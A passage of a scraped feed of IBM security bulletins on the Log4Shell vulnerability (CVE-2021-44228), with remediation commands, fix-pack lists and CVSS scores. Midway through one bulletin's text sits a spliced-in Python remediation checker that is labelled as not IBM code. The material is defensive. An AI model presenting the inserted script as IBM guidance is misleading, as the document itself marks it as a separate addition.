\n \n oc patch sts fci-elasticsearch-master -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-data -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-client -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n\nThe Elastic Search pods are restarted automatically after the commands are executed.\n\n 4. Ensure all Elastic search pods are restarted. \n \n oc get po | grep fci-elasticsearch\n\n 5. Verify if the log4j fix is applied successfully. The JVM process starts with a new JVM argument `-Dlog4j2.formatMsgNoLookups=true`. \n \n oc exec fci-elasticsearch-data-0 -- ps aux\n oc exec fci-elasticsearch-master-0 -- ps aux\n\n**Steps for Hadoop:**\n\nTo fix the log4j vulnerability in Hadoop for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. Download the [cloudera-scripts-for-log4j-main.zip](<https://github.com/cloudera/cloudera-scripts-for-log4j/archive/refs/heads/main.zip>) file.\n 2. Copy it to all the Hadoop nodes.\n 3. Do the following steps for every Hadoop nodes: \n 1. Copy the `cloudera-scripts-for-log4j-main.zip` file to the `/root/`.\n 2. Run the below commands to extract the `.zip` file: \n \n cd /root\n unzip cloudera-scripts-for-log4j-main.zip\n\n 3. Run the below command and note down the folder names, such as `/usr`, `/fcigraph`, `/grid`, etc. \n \n find / -name log4j*.jar > list_of_impacted_jars.txt\n\n 4. Create a backup folder with the below command. \n \n mkdir /log4j_backup\n\n 5. 
Run the following command for each folder to apply the fix: \n \n ./run_log4j_patcher.sh hdp -t /usr/ -b /log4j_backup > patch.log 2>&1 &\n\n**Note**: In the above command, replace `/usr/` with the folder names that are found, such as `/fcigraph/`, `/grid/`, etc.\n\nThis process may take 10 to 15 minutes.\n\n 4. Run the following commans to verify: \n \n cd /log4j_backup\n find . -name *.backup\n\n**Note**: This lists all the impacted `.jar` files that are patched, and the list matches the list_of_impacted_jars.txt.\n\n 5. Restart the impacted services from Ambari console (`hive` and `oozie`).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SS3QGT\",\"label\":\"IBM Financial Crimes Insight\"},\"Component\":\"FCI, DD, Surveillance, CFM - Banking, Healthcare, Insurance, Government\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:24:11", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects the components (Elastic Search and Hadoop) of IBM Financial Crimes Insight for Claims Fraud", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T18:24:11", "id": "2F83AABA00B663AFEF63A77633BECC48724170228D80CF284B2FA6A8E71FE2F8", "href": "https://www.ibm.com/support/pages/node/6527102", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:40", "description": "## Summary\n\nProcess Federation Server (PFS), shipped with IBM Business Automation Workflow (BAW), is vulnerable to a vulnerability caused by log4j. The vulnerability is included in the ElasticSearch client library used by PFS. The ElasticSearch vulnerable library was also shipped in offline documentation. The vulnerable library has already been removed with a prior security bulletin (linked from the Remediation/Fixes section).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Business Automation Workflow| V21.0 \nIBM Business Automation Workflow| V20.0 \nIBM Business Automation Workflow| V19.0 \nIBM Business Automation Workflow| V18.0.0.0.2 \n \nEarlier versions of IBM Business Automation Workflow and of IBM Business Process Manager are affected indirectly through WebSphere Application Server (see the link to the WebSphere Application Server bulletin in the Remediation/Fixes section). If the vulnerable version of Log4j was added to or used in custom applications, those customer applications may also be affected.\n\n## Remediation/Fixes\n\nPlease follow this [IBM PSIRT blog post](<https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/> \"IBM PSIRT blog post\" ) to keep up to date with additional information on this vulnerability and how it relates to your IBM products.\n\nIBM strongly recommends applying the Interim Fix (iFix) or Cumulative Fix (CF) containing APAR [JR64456](<https://www.ibm.com/support/docview.wss?uid=swg1JR64456> \"JR64456\" ) as soon as practical:\n\n * **Process Federation Server in [IBM Business Automation Workflow](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=aparId&apars=JR64456>) (including the fix for IBM Business Process Manager V8.6.0.0 2018.03)**\n\nIf you are using **IBM Business Automation Workflow V18.0, V19.0, V20.0, or V21.0**, do one of the following: \n\n * Upgrade to the minimal cumulative fix level required by the iFix and then apply iFix [JR64456](<https://www.ibm.com/support/docview.wss?uid=swg1JR64456> \"JR64456\" ) \n * Apply cumulative fix IBM Business Automation Workflow V21.0.3 or later\n\nIf you are using **IBM Business Automation Workflow on Containers,** apply cumulative fix [IBM Business Automation Workflow V21.0.2-IF006](<https://www.ibm.com/support/pages/node/6526316> \"IBM Business Automation Workflow 
V21.0.2-IF006\" ) or later. \n \n\n\nNote that fixes for various versions may become available over time. Upgrading Process Federation Server generally does not require migration. If you are on a version of Process Federation Server that uses Elasticsearch 7, you can seamlessly upgrade to 21.0.2 to apply the patch. \nIf you are on a version of Process Federation Server that uses Elasticsearch 6, you can seamlessly upgrade to Process Federation Server V20.0.0.1 and apply the patch.\n\nAnother vulnerable copy of the Log4j library was shipped with the offline documentation. If you have not already done so, remove the offline documentation as advised in [Security Bulletin: Multiple vulnerabilities may affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) offline documentation](<https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-may-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-offline-documentation/> \"Security Bulletin: Multiple vulnerabilities may affect IBM Business Automation Workflow and IBM Business Process Manager \\(BPM\\) offline documentation\" ).\n\nAs an additional protection, we recommend setting a Java system property for your Process Federation Server (or User Management Server) in jvm.options:\n\nAdd `-Dlog4j2.formatMsgNoLookups=true` to jvm.options as described in <https://www.ibm.com/docs/en/was-liberty/core?topic=manually-customizing-liberty-environment>. Alternatively, set the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS` to `true`. This setting can help mitigate risks in code (including custom code such as a TAI) that uses Log4j 2.10 or later, the first release that honours the property; it is a defence-in-depth measure to apply alongside the fixes above, not a substitute for them.\n\nIBM Business Automation Workflow builds on top of IBM WebSphere Application Server 8.5.5. 
You must also follow [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) to patch the underlying application server platform.\n\nIBM Business Automation Workflow allows customers to build apps on top of the platform. These apps may bring their own (vulnerable) copy of log4j-core-2.x and may use it from custom Java code. Review every custom app for a bundled log4j-core-2.x and fix all vulnerable uses of it; the product fixes above do not touch jars that your own apps carry.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
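The checks below are an added example written for this page; they are not IBM code and are not part of any of the bulletins. They verify from the outside the two remediations the Financial Crimes Insight steps describe (that `-Dlog4j2.formatMsgNoLookups=true` is on the Elasticsearch JVM command line that `oc exec ... -- ps aux` prints, and that the Cloudera patcher has stripped `JndiLookup.class` from the Hadoop jars), and they perform the audit the Business Automation Workflow bulletin asks for on custom apps that bundle their own log4j-core-2.x. The `ps aux` output and the three jars are constructed fixtures, the 2.17.0 threshold follows the Log4j level the bulletins on this page update to, and a jar whose version cannot be read is reported conservatively as needing attention.

```python
"""Added example (not IBM code): post-remediation checks for CVE-2021-44228.

- jvm_has_no_lookups(): confirms -Dlog4j2.formatMsgNoLookups=true is on the
  command line of every Java process in `ps aux` output.
- scan_jars(): walks a tree like `find / -name 'log4j*.jar'` and, for each
  log4j jar, reports the declared version and whether JndiLookup.class is
  still present (the Cloudera patcher removes it). A jar is flagged when the
  class is present and the version is below 2.17.0 or cannot be read.
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 17, 0)  # Log4j level the bulletins on this page update to
NO_LOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"


def jvm_has_no_lookups(ps_output: str, process_hint: str = "java") -> bool:
    """True only if at least one Java process is running and every one of
    them carries the flag; an empty pod must not pass by accident."""
    java_lines = [ln for ln in ps_output.splitlines() if process_hint in ln]
    return bool(java_lines) and all(NO_LOOKUPS_FLAG in ln for ln in java_lines)


def parse_version(pom_properties: str) -> Optional[Tuple[int, int, int]]:
    """Extract `version=2.14.1` from a Maven pom.properties file."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def inspect_jar(path: str) -> Dict[str, object]:
    """Read only the zip directory and pom.properties; nothing is executed."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = parse_version(jar.read(POM_PROPS).decode()) if POM_PROPS in names else None
    has_lookup = JNDI_LOOKUP in names
    # Lookup class present with an unreadable version is treated as needing attention.
    needs_fix = has_lookup and (version is None or version < FIXED_VERSION)
    return {"path": path, "version": version, "jndi_lookup": has_lookup, "needs_fix": needs_fix}


def scan_jars(root: str) -> List[Dict[str, object]]:
    """Equivalent of `find ROOT -name 'log4j*.jar'`, then inspect each hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.startswith("log4j") and name.endswith(".jar"):
                hits.append(inspect_jar(os.path.join(dirpath, name)))
    return hits


# Constructed fixture: what `oc exec fci-elasticsearch-data-0 -- ps aux` might
# print after the patch. Not captured from a real system.
SAMPLE_PS = (
    "USER  PID %CPU %MEM  VSZ  RSS TTY STAT START TIME COMMAND\n"
    "elasticsearch 1 2.0 40.1 9000000 1600000 ? Ssl 10:00 1:02 "
    "/usr/share/elasticsearch/jdk/bin/java -Xms1g -Xmx1g "
    "-Dlog4j2.formatMsgNoLookups=true -cp /usr/share/elasticsearch/lib/* "
    "org.elasticsearch.bootstrap.Elasticsearch\n"
    "root 57 0.0 0.0 50000 3000 ? Rs 10:05 0:00 ps aux\n"
)


def build_sample_tree(root: str) -> None:
    """Constructed fixtures, not product files: an unpatched 2.14.1 jar, a
    patched copy with JndiLookup.class stripped, and a 2.17.0 jar."""
    def write_jar(rel: str, version: str, with_lookup: bool) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if with_lookup:
                jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    write_jar("usr/lib/log4j-core-2.14.1.jar", "2.14.1", True)
    write_jar("grid/log4j-core-2.14.1.jar", "2.14.1", False)
    write_jar("fcigraph/log4j-core-2.17.0.jar", "2.17.0", True)


def demo() -> Dict[str, object]:
    """Run both checks against the constructed fixtures."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        hits = scan_jars(root)
        flagged = sorted(os.path.relpath(h["path"], root) for h in hits if h["needs_fix"])
    return {"jvm_ok": jvm_has_no_lookups(SAMPLE_PS), "jars_seen": len(hits), "needs_fix": flagged}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real host, point `scan_jars()` at `/` (or at the directories the `find` step listed) and feed `jvm_has_no_lookups()` the text returned by `oc exec <pod> -- ps aux`. The scanner only reads the zip central directory and one properties file, so it is safe to run on jars you do not trust; it does not cover log4j classes shaded into jars with other names, which is why the bulletins still tell you to review custom apps by hand.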
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFTBX\",\"label\":\"IBM Business Process Manager Express\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.6, 8.5.7.CF201706, 8.5.7.CF201703, 8.5.7.CF201612, 8.5.7.CF201609, 8.5.7.CF201606, 8.5.7, 8.5.6.2, 8.5.6.1, 8.5.6, 8.5.5, 8.5.0.2, 8.5.0.1, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS8JB4\",\"label\":\"IBM Business Automation Workflow\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"18.0.0.0, 18.0.0.1, 18.0.0.2, 19.0.0.1, 19.0.0.2, 19.0.0.3,20.0.0.1, 20.0.0.2,21.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFTN5\",\"label\":\"IBM Business Process Manager Advanced\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.6, 8.5.7.CF201706, 8.5.7.CF201703, 8.5.7.CF201612, 8.5.7.CF201609, 8.5.7.CF201606, 8.5.7, 8.5.6.2, 8.5.6.1, 8.5.6, 8.5.5, 8.5.0.2, 8.5.0.1, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o 
TPS\"},\"Product\":{\"code\":\"SSFTDH\",\"label\":\"IBM Business Process Manager Standard\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"8.6, 8.5.7.CF201706, 8.5.7.CF201703, 8.5.7.CF201612, 8.5.7.CF201609, 8.5.7.CF201606, 8.5.7, 8.5.6.2, 8.5.6.1, 8.5.6, 8.5.5, 8.5.0.2, 8.5.0.1, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T15:43:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Business Automation Workflow (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:43:05", "id": "5C1515C744F7537118B0717D85B52611810BBDF6206930989FA3E05682B9BEC8", "href": "https://www.ibm.com/support/pages/node/6527768", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:47:01", "description": "## Summary\n\nIBM Data Risk Manager (IDRM) 2.0.6.9 and earlier is impacted by Log4Shell (CVE-2021-44228), through the use of 
Apache Log4j's JNDI logging feature. This vulnerability has been addressed in the updated version IDRM 2.0.6.10. See the remediation steps below to apply the fix. All customers are encouraged to act quickly to update their systems.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Data Risk Manager (IDRM)| 2.0.6 through 2.0.6.9 \n \n## Remediation/Fixes\n\nThe fix packs are not cumulative: each one must be applied on top of the level immediately before it. Customers are therefore advised to upgrade step by step to 2.0.6.9 and then apply the latest fix pack, 2.0.6.10, which contains the Log4j fix. Starting from your installed level, apply every later fix pack in the order listed below; a system already at 2.0.6.9 applies only the last one.\n\n_Product_| _VRMF_| _APAR_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Data Risk Manager| 2.0.6 through 2.0.6.9| -| Apply, in sequence, each fix pack below that is later than the installed level, ending with DRM_2.0.6.10_FixPack \n \n1) [DRM_2.0.6.1_Fixpack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.4.1&platform=Linux&function=all>)\n\n2) [DRM_2.0.6.2_Fixpack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n3) [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n4) [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n5) [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n6) [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n7) [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n8) [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n9) [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n10) [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJQ6V\",\"label\":\"IBM Data Risk Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF004\",\"label\":\"Appliance\"}],\"Version\":\"2.0.6\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T04:28:35", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Data Risk Manager (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T04:28:35", "id": 
"5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "href": "https://www.ibm.com/support/pages/node/6527094", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:19", "description": "## Summary\n\nLog4j is used by IBM Spectrum Conductor for generating logs in some of its components. This bulletin provides patches for the Log4Shell vulnerability (CVE-2021-44228) to IBM Spectrum Conductor.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n## Remediation/Fixes\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104516| \n\n[sc-2.4.1-build600955](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0> \"sc-2.4.1-build600955\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104513| \n\n[sc-2.5-build600954](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0> \"sc-2.5-build600954\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104512| \n\n[sc-2.5.1-build600953](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0> \"sc-2.5.1-build600953\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts 